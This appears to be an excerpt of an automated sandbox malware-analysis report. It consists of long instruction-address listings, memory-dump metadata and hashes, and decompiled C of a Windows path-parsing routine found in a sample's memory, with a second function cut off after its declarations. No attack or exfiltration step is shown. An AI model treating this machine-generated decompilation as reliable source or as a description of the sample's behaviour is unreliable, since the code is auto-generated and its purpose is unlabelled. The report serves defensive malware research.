                                                                                                            0x011361e4
                                                                                                            0x011361e6
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e8
                                                                                                            0x011361e6
                                                                                                            0x011361ec
                                                                                                            0x011361f3
                                                                                                            0x01136203
                                                                                                            0x01136209
                                                                                                            0x0113620a
                                                                                                            0x01136216
                                                                                                            0x0113621d
                                                                                                            0x01136227
                                                                                                            0x01136241
                                                                                                            0x01136246
                                                                                                            0x0113624c
                                                                                                            0x01136257
                                                                                                            0x01136259
                                                                                                            0x0113625c
                                                                                                            0x0113625e
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x01136260
                                                                                                            0x0113625e
                                                                                                            0x01136264
                                                                                                            0x01136267
                                                                                                            0x01136269
                                                                                                            0x01136315
                                                                                                            0x01136315
                                                                                                            0x0113631b
                                                                                                            0x0113631e
                                                                                                            0x01136324
                                                                                                            0x01136327
                                                                                                            0x0113632f
                                                                                                            0x01136330
                                                                                                            0x01136333
                                                                                                            0x0113633a
                                                                                                            0x0113633c
                                                                                                            0x01136335
                                                                                                            0x01136335
                                                                                                            0x01136335
                                                                                                            0x0113633f
                                                                                                            0x01136342
                                                                                                            0x0113634c
                                                                                                            0x01136352
                                                                                                            0x01136355
                                                                                                            0x01136355
                                                                                                            0x01136359
                                                                                                            0x00000000
                                                                                                            0x0113626f
                                                                                                            0x01136275
                                                                                                            0x01136275
                                                                                                            0x01136278
                                                                                                            0x0113627e
                                                                                                            0x0113627e
                                                                                                            0x01136281
                                                                                                            0x01136287
                                                                                                            0x0113628d
                                                                                                            0x01136298
                                                                                                            0x0113629c
                                                                                                            0x011362a2
                                                                                                            0x0113629e
                                                                                                            0x0113629e
                                                                                                            0x0113629e
                                                                                                            0x011362a7
                                                                                                            0x011362a7
                                                                                                            0x011362aa
                                                                                                            0x011362b0
                                                                                                            0x011362f0
                                                                                                            0x011362f0
                                                                                                            0x011362f2
                                                                                                            0x011362f8
                                                                                                            0x011362fd
                                                                                                            0x011362b2
                                                                                                            0x011362b2
                                                                                                            0x011362b2
                                                                                                            0x011362b5
                                                                                                            0x011362dd
                                                                                                            0x011362e2
                                                                                                            0x011362e5
                                                                                                            0x011362b7
                                                                                                            0x011362b8
                                                                                                            0x011362bb
                                                                                                            0x011362bd
                                                                                                            0x011362c0
                                                                                                            0x011362c4
                                                                                                            0x011362cd
                                                                                                            0x011362cd
                                                                                                            0x011362c0
                                                                                                            0x011362bb
                                                                                                            0x011362b5
                                                                                                            0x01136302
                                                                                                            0x01136303
                                                                                                            0x01136305
                                                                                                            0x01136305
                                                                                                            0x01136305
                                                                                                            0x0113630c
                                                                                                            0x0113630c
                                                                                                            0x00000000
                                                                                                            0x0113627e
                                                                                                            0x01136269
                                                                                                            0x01135eac
                                                                                                            0x01135ebb
                                                                                                            0x01135ebe
                                                                                                            0x01135ecb
                                                                                                            0x01135ecb
                                                                                                            0x01135ece
                                                                                                            0x01135ece
                                                                                                            0x01135ed4
                                                                                                            0x01135ed7
                                                                                                            0x01135ed9
                                                                                                            0x01135edb
                                                                                                            0x01135edb
                                                                                                            0x01135ee1
                                                                                                            0x01135ee1
                                                                                                            0x01135ee3
                                                                                                            0x01135f20
                                                                                                            0x01135f20
                                                                                                            0x01135ee5
                                                                                                            0x01135ee5
                                                                                                            0x01135ee5
                                                                                                            0x01135ee8
                                                                                                            0x01135f11
                                                                                                            0x01135f18
                                                                                                            0x01135eea
                                                                                                            0x01135eea
                                                                                                            0x01135eed
                                                                                                            0x01135ef2
                                                                                                            0x01135ef8
                                                                                                            0x01135efb
                                                                                                            0x01135f0a
                                                                                                            0x01135f0a
                                                                                                            0x01135eed
                                                                                                            0x01135ee8
                                                                                                            0x01135f22
                                                                                                            0x01135f28
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135f30
                                                                                                            0x01135f31
                                                                                                            0x01135f37
                                                                                                            0x01135f3a
                                                                                                            0x01135f3d
                                                                                                            0x01135f44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135f46
                                                                                                            0x01135f48
                                                                                                            0x01135f4d
                                                                                                            0x00000000
                                                                                                            0x01135f4d
                                                                                                            0x01135dda
                                                                                                            0x01135ddf
                                                                                                            0x00000000
                                                                                                            0x01135ddf
                                                                                                            0x01135dd8
                                                                                                            0x01135da7
                                                                                                            0x01135da9
                                                                                                            0x01135dac
                                                                                                            0x01135dae
                                                                                                            0x00000000
                                                                                                            0x01135db4
                                                                                                            0x01135db4
                                                                                                            0x00000000
                                                                                                            0x01135db4
                                                                                                            0x01135dae
                                                                                                            0x01135d88
                                                                                                            0x01135d8d
                                                                                                            0x01136363
                                                                                                            0x01136369
                                                                                                            0x0113636a
                                                                                                            0x01136370
                                                                                                            0x01136372
                                                                                                            0x0113637a
                                                                                                            0x0113637b
                                                                                                            0x0113637d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0113637f
                                                                                                            0x01136385
                                                                                                            0x00000000
                                                                                                            0x01136385
                                                                                                            0x01135d38
                                                                                                            0x01135d3b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d3b
                                                                                                            0x01135d27
                                                                                                            0x01135d29
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01136360
                                                                                                            0x00000000
                                                                                                            0x01136360
                                                                                                            0x01135c10
                                                                                                            0x01135c10
                                                                                                            0x011363da
                                                                                                            0x011363e5
                                                                                                            0x011363e5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b14ab649cad727db4a7804adab723f5c9d47f3455fb505db674f51174a347ff
                                                                                                            • Instruction ID: 6a6fbd8a195455baf80e571b92b87deaf9647a584881ebddca9986d782c2eba0
                                                                                                            • Opcode Fuzzy Hash: 6b14ab649cad727db4a7804adab723f5c9d47f3455fb505db674f51174a347ff
                                                                                                            • Instruction Fuzzy Hash: 4D427C71900229DFDB68CF68C880BA9BBB1FF85704F1581AAD94DEB246D7349A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01084120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E01084120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x115d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0109F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01086E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01084620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01086E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M010845F8))) {
												case 0:
													_v568 = 0x1041078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x10411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01084620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E010AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E010AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E010652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0107EB70(1, 0x11579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0107AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E010A95D0();
																			L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E010AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E010A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E010AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                            0x01084128
                                                                                                            0x01084135
                                                                                                            0x0108413c
                                                                                                            0x01084141
                                                                                                            0x01084145
                                                                                                            0x01084147
                                                                                                            0x0108414e
                                                                                                            0x01084151
                                                                                                            0x01084159
                                                                                                            0x0108415c
                                                                                                            0x01084160
                                                                                                            0x01084164
                                                                                                            0x01084168
                                                                                                            0x0108416c
                                                                                                            0x0108417f
                                                                                                            0x01084181
                                                                                                            0x0108446a
                                                                                                            0x0108446a
                                                                                                            0x0108418c
                                                                                                            0x01084195
                                                                                                            0x01084199
                                                                                                            0x01084432
                                                                                                            0x01084439
                                                                                                            0x0108443d
                                                                                                            0x01084442
                                                                                                            0x01084447
                                                                                                            0x00000000
                                                                                                            0x0108419f
                                                                                                            0x010841a3
                                                                                                            0x010841b1
                                                                                                            0x010841b9
                                                                                                            0x010841bd
                                                                                                            0x010845db
                                                                                                            0x010845db
                                                                                                            0x00000000
                                                                                                            0x010841c3
                                                                                                            0x010841c3
                                                                                                            0x010841ce
                                                                                                            0x010841d4
                                                                                                            0x010ce138
                                                                                                            0x010ce13e
                                                                                                            0x010ce169
                                                                                                            0x010ce16d
                                                                                                            0x010ce19e
                                                                                                            0x010ce16f
                                                                                                            0x010ce16f
                                                                                                            0x010ce175
                                                                                                            0x010ce179
                                                                                                            0x010ce18f
                                                                                                            0x010ce193
                                                                                                            0x00000000
                                                                                                            0x010ce199
                                                                                                            0x00000000
                                                                                                            0x010ce199
                                                                                                            0x010ce193
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010841da
                                                                                                            0x010841da
                                                                                                            0x010841df
                                                                                                            0x010841e4
                                                                                                            0x010841ec
                                                                                                            0x01084203
                                                                                                            0x01084207
                                                                                                            0x010ce1fd
                                                                                                            0x01084222
                                                                                                            0x01084226
                                                                                                            0x010ce1f3
                                                                                                            0x010ce1f3
                                                                                                            0x0108422c
                                                                                                            0x0108422c
                                                                                                            0x01084233
                                                                                                            0x010ce1ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01084239
                                                                                                            0x01084239
                                                                                                            0x01084239
                                                                                                            0x01084239
                                                                                                            0x01084233
                                                                                                            0x01084226
                                                                                                            0x010841ee
                                                                                                            0x010841ee
                                                                                                            0x010841f4
                                                                                                            0x01084575
                                                                                                            0x010ce1b1
                                                                                                            0x010ce1b1
                                                                                                            0x00000000
                                                                                                            0x0108457b
                                                                                                            0x0108457b
                                                                                                            0x01084582
                                                                                                            0x010ce1ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01084588
                                                                                                            0x01084588
                                                                                                            0x0108458c
                                                                                                            0x010ce1c4
                                                                                                            0x010ce1c4
                                                                                                            0x00000000
                                                                                                            0x01084592
                                                                                                            0x01084592
                                                                                                            0x01084599
                                                                                                            0x010ce1be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108459f
                                                                                                            0x0108459f
                                                                                                            0x010845a3
                                                                                                            0x010ce1d7
                                                                                                            0x010ce1e4
                                                                                                            0x00000000
                                                                                                            0x010845a9
                                                                                                            0x010845a9
                                                                                                            0x010845b0
                                                                                                            0x010ce1d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010845b6
                                                                                                            0x010845b6
                                                                                                            0x010845b6
                                                                                                            0x00000000
                                                                                                            0x010845b6
                                                                                                            0x010845b0
                                                                                                            0x010845a3
                                                                                                            0x01084599
                                                                                                            0x0108458c
                                                                                                            0x01084582
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010841f4
                                                                                                            0x0108423e
                                                                                                            0x01084241
                                                                                                            0x010845c0
                                                                                                            0x010845c4
                                                                                                            0x00000000
                                                                                                            0x010845ca
                                                                                                            0x010845ca
                                                                                                            0x00000000
                                                                                                            0x010ce207
                                                                                                            0x010ce20f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010845d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010845ca
                                                                                                            0x00000000
                                                                                                            0x01084247
                                                                                                            0x01084247
                                                                                                            0x01084247
                                                                                                            0x01084249
                                                                                                            0x01084249
                                                                                                            0x01084249
                                                                                                            0x01084251
                                                                                                            0x01084251
                                                                                                            0x01084257
                                                                                                            0x0108425f
                                                                                                            0x0108426e
                                                                                                            0x01084270
                                                                                                            0x0108427a
                                                                                                            0x010ce219
                                                                                                            0x010ce219
                                                                                                            0x01084280
                                                                                                            0x01084282
                                                                                                            0x01084456
                                                                                                            0x010845ea
                                                                                                            0x00000000
                                                                                                            0x010845f0
                                                                                                            0x010ce223
                                                                                                            0x00000000
                                                                                                            0x010ce223
                                                                                                            0x0108445c
                                                                                                            0x0108445c
                                                                                                            0x00000000
                                                                                                            0x0108445c
                                                                                                            0x00000000
                                                                                                            0x01084288
                                                                                                            0x0108428c
                                                                                                            0x010ce298
                                                                                                            0x01084292
                                                                                                            0x01084292
                                                                                                            0x0108429e
                                                                                                            0x010842a3
                                                                                                            0x010842a7
                                                                                                            0x010842ac
                                                                                                            0x010ce22d
                                                                                                            0x010842b2
                                                                                                            0x010842b2
                                                                                                            0x010842b9
                                                                                                            0x010842bc
                                                                                                            0x010842c2
                                                                                                            0x010842ca
                                                                                                            0x010842cd
                                                                                                            0x010842cd
                                                                                                            0x010842d4
                                                                                                            0x0108433f
                                                                                                            0x0108433f
                                                                                                            0x010842d6
                                                                                                            0x010842d6
                                                                                                            0x010842d9
                                                                                                            0x010842dd
                                                                                                            0x010842eb
                                                                                                            0x010ce23a
                                                                                                            0x010842f1
                                                                                                            0x01084305
                                                                                                            0x0108430d
                                                                                                            0x01084315
                                                                                                            0x01084318
                                                                                                            0x0108431f
                                                                                                            0x01084322
                                                                                                            0x0108432e
                                                                                                            0x0108433b
                                                                                                            0x0108433b
                                                                                                            0x00000000
                                                                                                            0x0108432e
                                                                                                            0x010842eb
                                                                                                            0x0108434c
                                                                                                            0x0108434e
                                                                                                            0x01084352
                                                                                                            0x01084359
                                                                                                            0x0108435e
                                                                                                            0x01084361
                                                                                                            0x0108436e
                                                                                                            0x0108438a
                                                                                                            0x0108438e
                                                                                                            0x01084396
                                                                                                            0x0108439e
                                                                                                            0x010843a1
                                                                                                            0x010843ad
                                                                                                            0x010843bb
                                                                                                            0x010843bb
                                                                                                            0x010843ad
                                                                                                            0x0108436e
                                                                                                            0x010843bf
                                                                                                            0x010843c5
                                                                                                            0x01084463
                                                                                                            0x01084463
                                                                                                            0x010843ce
                                                                                                            0x010843d5
                                                                                                            0x010843d9
                                                                                                            0x010843df
                                                                                                            0x01084475
                                                                                                            0x01084479
                                                                                                            0x01084491
                                                                                                            0x01084491
                                                                                                            0x01084479
                                                                                                            0x010843e5
                                                                                                            0x010843eb
                                                                                                            0x010843f4
                                                                                                            0x010843f6
                                                                                                            0x010843f9
                                                                                                            0x010843fc
                                                                                                            0x010843ff
                                                                                                            0x010844e8
                                                                                                            0x010844ed
                                                                                                            0x010844f3
                                                                                                            0x010ce247
                                                                                                            0x00000000
                                                                                                            0x010844f9
                                                                                                            0x01084504
                                                                                                            0x01084508
                                                                                                            0x0108450f
                                                                                                            0x010ce269
                                                                                                            0x00000000
                                                                                                            0x01084515
                                                                                                            0x01084519
                                                                                                            0x01084531
                                                                                                            0x01084534
                                                                                                            0x01084537
                                                                                                            0x0108453e
                                                                                                            0x01084541
                                                                                                            0x0108454a
                                                                                                            0x010ce255
                                                                                                            0x010ce255
                                                                                                            0x010ce25b
                                                                                                            0x010ce25e
                                                                                                            0x010ce261
                                                                                                            0x010ce261
                                                                                                            0x01084555
                                                                                                            0x01084559
                                                                                                            0x0108455d
                                                                                                            0x010ce26d
                                                                                                            0x010ce270
                                                                                                            0x010ce274
                                                                                                            0x010ce27a
                                                                                                            0x010ce27d
                                                                                                            0x010ce28e
                                                                                                            0x010ce28e
                                                                                                            0x01084563
                                                                                                            0x01084563
                                                                                                            0x01084569
                                                                                                            0x01084569
                                                                                                            0x00000000
                                                                                                            0x0108455d
                                                                                                            0x0108450f
                                                                                                            0x00000000
                                                                                                            0x010844f3
                                                                                                            0x010843ff
                                                                                                            0x01084405
                                                                                                            0x01084405
                                                                                                            0x01084405
                                                                                                            0x010842ac
                                                                                                            0x0108428c
                                                                                                            0x01084282
                                                                                                            0x01084407
                                                                                                            0x0108440d
                                                                                                            0x010ce2af
                                                                                                            0x010ce2af
                                                                                                            0x01084413
                                                                                                            0x01084413
                                                                                                            0x00000000
                                                                                                            0x010841d4
                                                                                                            0x00000000
                                                                                                            0x010841c3
                                                                                                            0x010841bd
                                                                                                            0x01084415
                                                                                                            0x01084415
                                                                                                            0x01084416
                                                                                                            0x01084417
                                                                                                            0x01084429
                                                                                                            0x0108416e
                                                                                                            0x0108416e
                                                                                                            0x01084175
                                                                                                            0x01084498
                                                                                                            0x0108449f
                                                                                                            0x010ce12d
                                                                                                            0x00000000
                                                                                                            0x010ce133
                                                                                                            0x00000000
                                                                                                            0x010ce133
                                                                                                            0x010844a5
                                                                                                            0x010844a5
                                                                                                            0x010844aa
                                                                                                            0x00000000
                                                                                                            0x010844bb
                                                                                                            0x010844ca
                                                                                                            0x010844d6
                                                                                                            0x010844d7
                                                                                                            0x010844d8
                                                                                                            0x010844e3
                                                                                                            0x010844e3
                                                                                                            0x010844aa
                                                                                                            0x0108417b
                                                                                                            0x0108417b
                                                                                                            0x0108417b
                                                                                                            0x00000000
                                                                                                            0x0108417b
                                                                                                            0x01084175
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aef2f2abcc77ec36105ab96978e6bf9f50227eada649864a62eb88ef547e454a
                                                                                                            • Instruction ID: dfc09563cdfd709b8c3f7d84adcaf81bf90be4d2c64feac0b8393830f32e3157
                                                                                                            • Opcode Fuzzy Hash: aef2f2abcc77ec36105ab96978e6bf9f50227eada649864a62eb88ef547e454a
                                                                                                            • Instruction Fuzzy Hash: EAF169706082128BC764EF58C480B7EBBE1EF98714F55896EF9C6CB291E734D891CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010920A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E010920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
